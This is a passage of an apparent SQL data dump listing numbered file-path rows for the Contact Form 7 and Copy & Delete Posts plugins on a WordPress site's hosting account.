/index.js'),(455,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/recaptcha/recaptcha.php','wp-content/plugins/contact-form-7/modules/recaptcha/recaptcha.php'),(456,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/recaptcha/service.php','wp-content/plugins/contact-form-7/modules/recaptcha/service.php'),(457,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/reflection.php','wp-content/plugins/contact-form-7/modules/reflection.php'),(458,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/response.php','wp-content/plugins/contact-form-7/modules/response.php'),(459,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/select.php','wp-content/plugins/contact-form-7/modules/select.php'),(460,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/sendinblue/contact-form-properties.php','wp-content/plugins/contact-form-7/modules/sendinblue/contact-form-properties.php'),(461,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/sendinblue/doi.php','wp-content/plugins/contact-form-7/modules/sendinblue/doi.php'),(462,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/sendinblue/sendinblue.php','wp-content/plugins/contact-form-7/modules/sendinblue/sendinblue.php'),(463,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/sendinblue/service.php','wp-content/plugins/contact-form-7/modules/sendinblue/service.php'),(464,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/stripe/api.php','wp-content/plugins/contact-form-7/modules/stripe/api.php'),(465,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/stripe/index.asset.php','wp-content/plugins/contact-form-7/modules/stripe/index.asset.php'),(466,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/stripe/index.js','wp-content/plugins/contact-form-7/modules/stripe/index.js'),(467,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/stripe/service.php','wp-content/plugins/contact-form-7/modules/stripe/service.php'),(468,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/stripe/stripe.php','wp-content/plugins/contact-form-7/modules/stripe/stripe.php'),(469,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/submit.php','wp-content/plugins/contact-form-7/modules/submit.php'),(470,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/text.php','wp-content/plugins/contact-form-7/modules/text.php'),(471,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/modules/textarea.php','wp-content/plugins/contact-form-7/modules/textarea.php'),(472,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/uninstall.php','wp-content/plugins/contact-form-7/uninstall.php'),(473,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/contact-form-7/wp-contact-form-7.php','wp-content/plugins/contact-form-7/wp-contact-form-7.php'),(474,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/assets/css/customize.css','wp-content/plugins/copy-delete-posts/analyst/assets/css/customize.css'),(475,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/assets/img/pencil.png','wp-content/plugins/copy-delete-posts/analyst/assets/img/pencil.png'),(476,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/assets/img/shield_question.png','wp-content/plugins/copy-delete-posts/analyst/assets/img/shield_question.png'),(477,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/assets/img/shield_success.png','wp-content/plugins/copy-delete-posts/analyst/assets/img/shield_success.png'),(478,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/assets/img/smile.png','wp-content/plugins/copy-delete-posts/analyst/assets/img/smile.png'),(479,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/assets/index.php','wp-content/plugins/copy-delete-posts/analyst/assets/index.php'),(480,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/assets/js/customize.js','wp-content/plugins/copy-delete-posts/analyst/assets/js/customize.js'),(481,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/autoload.php','wp-content/plugins/copy-delete-posts/analyst/autoload.php'),(482,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/index.php','wp-content/plugins/copy-delete-posts/analyst/index.php'),(483,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/main.php','wp-content/plugins/copy-delete-posts/analyst/main.php'),(484,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/sdk_resolver.php','wp-content/plugins/copy-delete-posts/analyst/sdk_resolver.php'),(485,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Account/Account.php','wp-content/plugins/copy-delete-posts/analyst/src/Account/Account.php'),(486,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Account/AccountData.php','wp-content/plugins/copy-delete-posts/analyst/src/Account/AccountData.php'),(487,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Account/AccountDataFactory.php','wp-content/plugins/copy-delete-posts/analyst/src/Account/AccountDataFactory.php'),(488,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Analyst.php','wp-content/plugins/copy-delete-posts/analyst/src/Analyst.php'),(489,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/ApiRequestor.php','wp-content/plugins/copy-delete-posts/analyst/src/ApiRequestor.php'),(490,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/ApiResponse.php','wp-content/plugins/copy-delete-posts/analyst/src/ApiResponse.php'),(491,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Cache/DatabaseCache.php','wp-content/plugins/copy-delete-posts/analyst/src/Cache/DatabaseCache.php'),(492,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Collector.php','wp-content/plugins/copy-delete-posts/analyst/src/Collector.php'),(493,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Contracts/AnalystContract.php','wp-content/plugins/copy-delete-posts/analyst/src/Contracts/AnalystContract.php'),(494,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Contracts/CacheContract.php','wp-content/plugins/copy-delete-posts/analyst/src/Contracts/CacheContract.php'),(495,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Contracts/HttpClientContract.php','wp-content/plugins/copy-delete-posts/analyst/src/Contracts/HttpClientContract.php'),(496,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Contracts/RequestContract.php','wp-content/plugins/copy-delete-posts/analyst/src/Contracts/RequestContract.php'),(497,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Contracts/RequestorContract.php','wp-content/plugins/copy-delete-posts/analyst/src/Contracts/RequestorContract.php'),(498,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Contracts/TrackerContract.php','wp-content/plugins/copy-delete-posts/analyst/src/Contracts/TrackerContract.php'),(499,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Core/AbstractFactory.php','wp-content/plugins/copy-delete-posts/analyst/src/Core/AbstractFactory.php'),(500,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/CurlHttpClient.php','wp-content/plugins/copy-delete-posts/analyst/src/Http/CurlHttpClient.php'),(501,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/DummyHttpClient.php','wp-content/plugins/copy-delete-posts/analyst/src/Http/DummyHttpClient.php'),(502,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/AbstractLoggerRequest.php','wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/AbstractLoggerRequest.php'),(503,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/ActivateRequest.php','wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/ActivateRequest.php'),(504,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/DeactivateRequest.php','wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/DeactivateRequest.php'),(505,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/InstallRequest.php','wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/InstallRequest.php'),(506,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/OptInRequest.php','wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/OptInRequest.php'),(507,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/OptOutRequest.php','wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/OptOutRequest.php'),(508,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/UninstallRequest.php','wp-content/plugins/copy-delete-posts/analyst/src/Http/Requests/UninstallRequest.php'),(509,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Http/WordPressHttpClient.php','wp-content/plugins/copy-delete-posts/analyst/src/Http/WordPressHttpClient.php'),(510,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Mutator.php','wp-content/plugins/copy-delete-posts/analyst/src/Mutator.php'),(511,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Notices/Notice.php','wp-content/plugins/copy-delete-posts/analyst/src/Notices/Notice.php'),(512,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/Notices/NoticeFactory.php','wp-content/plugins/copy-delete-posts/analyst/src/Notices/NoticeFactory.php'),(513,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/src/helpers.php','wp-content/plugins/copy-delete-posts/analyst/src/helpers.php'),(514,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/templates/forms/deactivate.php','wp-content/plugins/copy-delete-posts/analyst/templates/forms/deactivate.php'),(515,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/templates/forms/install.php','wp-content/plugins/copy-delete-posts/analyst/templates/forms/install.php'),(516,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/templates/notice.php','wp-content/plugins/copy-delete-posts/analyst/templates/notice.php'),(517,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/templates/optin.php','wp-content/plugins/copy-delete-posts/analyst/templates/optin.php'),(518,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/templates/optout.php','wp-content/plugins/copy-delete-posts/analyst/templates/optout.php'),(519,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/analyst/version.php','wp-content/plugins/copy-delete-posts/analyst/version.php'),(520,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/css/cdp-editor.min.css','wp-content/plugins/copy-delete-posts/assets/css/cdp-editor.min.css'),(521,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/css/cdp-global.min.css','wp-content/plugins/copy-delete-posts/assets/css/cdp-global.min.css'),(522,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/css/cdp-gutenberg.min.css','wp-content/plugins/copy-delete-posts/assets/css/cdp-gutenberg.min.css'),(523,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/css/cdp-select.min.css','wp-content/plugins/copy-delete-posts/assets/css/cdp-select.min.css'),(524,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/css/cdp-user.min.css','wp-content/plugins/copy-delete-posts/assets/css/cdp-user.min.css'),(525,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/css/cdp.min.css','wp-content/plugins/copy-delete-posts/assets/css/cdp.min.css'),(526,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/css/cdp.tooltip.min.css','wp-content/plugins/copy-delete-posts/assets/css/cdp.tooltip.min.css'),(527,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Bold.woff2','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Bold.woff2'),(528,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-ExtraBold.woff2','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-ExtraBold.woff2'),(529,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-ExtraLight.woff2','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-ExtraLight.woff2'),(530,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Italic.woff2','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Italic.woff2'),(531,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Light.woff2','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Light.woff2'),(532,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Medium.woff2','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Medium.woff2'),(533,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Regular.woff2','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-Regular.woff2'),(534,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-SemiBold.woff2','wp-content/plugins/copy-delete-posts/assets/fonts/Montserrat-SemiBold.woff2'),(535,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/alert_error.png','wp-content/plugins/copy-delete-posts/assets/imgs/alert_error.png'),(536,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/alert_info.png','wp-content/plugins/copy-delete-posts/assets/imgs/alert_info.png'),(537,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/alert_success.png','wp-content/plugins/copy-delete-posts/assets/imgs/alert_success.png'),(538,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/alert_warning.png','wp-content/plugins/copy-delete-posts/assets/imgs/alert_warning.png'),(539,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/arrow.png','wp-content/plugins/copy-delete-posts/assets/imgs/arrow.png'),(540,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/close.png','wp-content/plugins/copy-delete-posts/assets/imgs/close.png'),(541,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/copy.png','wp-content/plugins/copy-delete-posts/assets/imgs/copy.png'),(542,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/icon.png','wp-content/plugins/copy-delete-posts/assets/imgs/icon.png'),(543,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/info.png','wp-content/plugins/copy-delete-posts/assets/imgs/info.png'),(544,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/intro_1.gif','wp-content/plugins/copy-delete-posts/assets/imgs/intro_1.gif'),(545,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/intro_2.gif','wp-content/plugins/copy-delete-posts/assets/imgs/intro_2.gif'),(546,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/intro_3.gif','wp-content/plugins/copy-delete-posts/assets/imgs/intro_3.gif'),(547,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/premium.png','wp-content/plugins/copy-delete-posts/assets/imgs/premium.png'),(548,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/redirections.png','wp-content/plugins/copy-delete-posts/assets/imgs/redirections.png'),(549,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/search.png','wp-content/plugins/copy-delete-posts/assets/imgs/search.png'),(550,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/smile.svg','wp-content/plugins/copy-delete-posts/assets/imgs/smile.svg'),(551,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/imgs/stars.gif','wp-content/plugins/copy-delete-posts/assets/imgs/stars.gif'),(552,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/js/cdp-bulk.min.js','wp-content/plugins/copy-delete-posts/assets/js/cdp-bulk.min.js'),(553,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/js/cdp-global.min.js','wp-content/plugins/copy-delete-posts/assets/js/cdp-global.min.js'),(554,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/js/cdp-gutenberg.min.js','wp-content/plugins/copy-delete-posts/assets/js/cdp-gutenberg.min.js'),(555,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/js/cdp-icPagination.min.js','wp-content/plugins/copy-delete-posts/assets/js/cdp-icPagination.min.js'),(556,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/js/cdp-modal.min.js','wp-content/plugins/copy-delete-posts/assets/js/cdp-modal.min.js'),(557,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/js/cdp-select.min.js','wp-content/plugins/copy-delete-posts/assets/js/cdp-select.min.js'),(558,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/js/cdp-user.min.js','wp-content/plugins/copy-delete-posts/assets/js/cdp-user.min.js'),(559,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/js/cdp.min.js','wp-content/plugins/copy-delete-posts/assets/js/cdp.min.js'),(560,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/assets/js/cdp.tooltip.min.js','wp-content/plugins/copy-delete-posts/assets/js/cdp.tooltip.min.js'),(561,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/assets/index.min.js','wp-content/plugins/copy-delete-posts/banner/assets/index.min.js'),(562,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/assets/style.min.css','wp-content/plugins/copy-delete-posts/banner/assets/style.min.css'),(563,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/misc.php','wp-content/plugins/copy-delete-posts/banner/misc.php'),(564,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/index.php','wp-content/plugins/copy-delete-posts/banner/views/index.php'),(565,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/background-images.png','wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/background-images.png'),(566,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/background-texture-grey.png','wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/background-texture-grey.png'),(567,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/big-colored-logo.png','wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/big-colored-logo.png'),(568,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/colored-logo.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/colored-logo.svg'),(569,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/white-logo.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/imgs/white-logo.svg'),(570,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/install.php','wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/install.php'),(571,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/installed.php','wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/installed.php'),(572,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/upgrade.php','wp-content/plugins/copy-delete-posts/banner/views/projects/bmi/upgrade.php'),(573,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/background-texture-grey.png','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/background-texture-grey.png'),(574,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/big-colored-logo.png','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/big-colored-logo.png'),(575,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/colored-logo.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/colored-logo.svg'),(576,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/main-background-image.png','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/main-background-image.png'),(577,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/secondary-background-image.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/secondary-background-image.svg'),(578,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/white-logo.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/imgs/white-logo.svg'),(579,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/install.php','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/install.php'),(580,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/installed.php','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/installed.php'),(581,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/upgrade.php','wp-content/plugins/copy-delete-posts/banner/views/projects/cdp/upgrade.php'),(582,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-bottom-left.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-bottom-left.svg'),(583,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-bottom-right.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-bottom-right.svg'),(584,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-top-left.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-top-left.svg'),(585,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-top-right.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/background-top-right.svg'),(586,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/big-colored-logo.png','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/big-colored-logo.png'),(587,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/colored-logo.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/colored-logo.svg'),(588,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face1.png','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face1.png'),(589,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face2.png','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face2.png'),(590,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face3.png','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face3.png'),(591,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face4.png','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/face4.png'),(592,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/white-logo.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/imgs/white-logo.svg'),(593,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/fit/install.php','wp-content/plugins/copy-delete-posts/banner/views/projects/fit/install.php'),(594,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/background-images.png','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/background-images.png'),(595,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/background-texture-green.png','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/background-texture-green.png'),(596,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/background-texture-grey.png','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/background-texture-grey.png'),(597,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/big-colored-logo.png','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/big-colored-logo.png'),(598,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/colored-logo.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/colored-logo.svg'),(599,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/white-logo.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/imgs/white-logo.svg'),(600,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/install.php','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/install.php'),(601,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/installed.php','wp-content/plugins/copy-delete-posts/banner/views/projects/mpu/installed.php'),(602,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/background-top-left.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/background-top-left.svg'),(603,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/big-colored-logo-rr.png','wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/big-colored-logo-rr.png'),(604,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/colored-logo-rr.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/colored-logo-rr.svg'),(605,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/main-background-image.png','wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/main-background-image.png'),(606,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/not-colored-logo.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/red/imgs/not-colored-logo.svg'),(607,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/red/install.php','wp-content/plugins/copy-delete-posts/banner/views/projects/red/install.php'),(608,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/red/installed.php','wp-content/plugins/copy-delete-posts/banner/views/projects/red/installed.php'),(609,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/background-image-1.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/background-image-1.svg'),(610,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/background-image-2.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/background-image-2.svg'),(611,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/background-image-3.svg','wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/background-image-3.svg'),(612,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/big-colored-logo.png','wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/big-colored-logo.png'),(613,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/banner/views/projects/twp/imgs/colored-logo.svg','wp-content/plugins/copy-de